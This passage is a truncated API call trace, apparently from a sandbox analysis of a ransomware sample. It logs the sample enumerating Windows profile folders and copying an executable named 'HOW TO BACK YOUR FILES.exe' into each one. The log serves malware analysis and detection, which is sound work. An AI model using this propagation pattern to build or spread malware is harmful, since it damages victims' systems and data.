() returned 0x0 [0065.845] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.845] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.845] CloseHandle (hObject=0x154) returned 1 [0065.845] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.846] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.846] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.846] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.846] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History" [0065.846] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History" [0065.846] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.846] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\history\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.846] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.847] GetLastError () returned 0x0 [0065.847] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.847] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.847] CloseHandle (hObject=0x154) returned 1 [0065.847] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.847] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x58966660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58966660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.847] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.847] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.847] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\Low" [0065.847] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\Low" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\Low" [0065.847] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.847] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\history\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.848] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.848] GetLastError () returned 0x0 [0065.848] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.848] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.848] CloseHandle (hObject=0x154) returned 1 [0065.848] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.848] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\Low\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4acc4f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.849] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.849] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.849] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\History.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\History.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\History.IE5" [0065.849] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\History.IE5" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\History.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\History.IE5" [0065.849] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.849] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\history\\history.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.849] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.849] GetLastError () returned 0x0 [0065.850] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.850] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.850] CloseHandle (hObject=0x154) returned 1 [0065.850] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.850] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x589d8a80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x589d8a80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.850] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.850] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.850] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data" [0065.850] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data" [0065.850] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.850] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.851] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.851] GetLastError () returned 0x0 [0065.851] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.851] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.851] CloseHandle (hObject=0x154) returned 1 [0065.851] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.851] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49f874e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49f874e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.851] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.852] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.852] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" [0065.852] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" [0065.852] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.852] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\temporary internet files\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.852] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.852] GetLastError () returned 0x0 [0065.852] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.853] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.853] CloseHandle (hObject=0x154) returned 1 [0065.853] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.853] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x555c6940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x555c6940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.853] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.853] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.853] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" [0065.853] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" [0065.853] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.853] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\temporary internet files\\virtualized\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.854] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.854] GetLastError () returned 0x0 [0065.854] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.854] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.854] CloseHandle (hObject=0x154) returned 1 [0065.854] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.854] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a423f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.855] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.855] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.855] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" [0065.855] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" [0065.855] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.855] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\temporary internet files\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.855] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.855] GetLastError () returned 0x0 [0065.856] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.856] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.856] CloseHandle (hObject=0x154) returned 1 [0065.856] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.856] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a44a0e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a44a0e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.856] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.856] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.856] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" [0065.856] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" [0065.856] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.856] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.857] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.857] GetLastError () returned 0x0 [0065.857] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.857] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.857] CloseHandle (hObject=0x154) returned 1 [0065.857] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.857] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x55638d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55638d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.857] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.858] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.858] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0065.858] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0065.858] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.858] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\x9ohk109\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.858] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 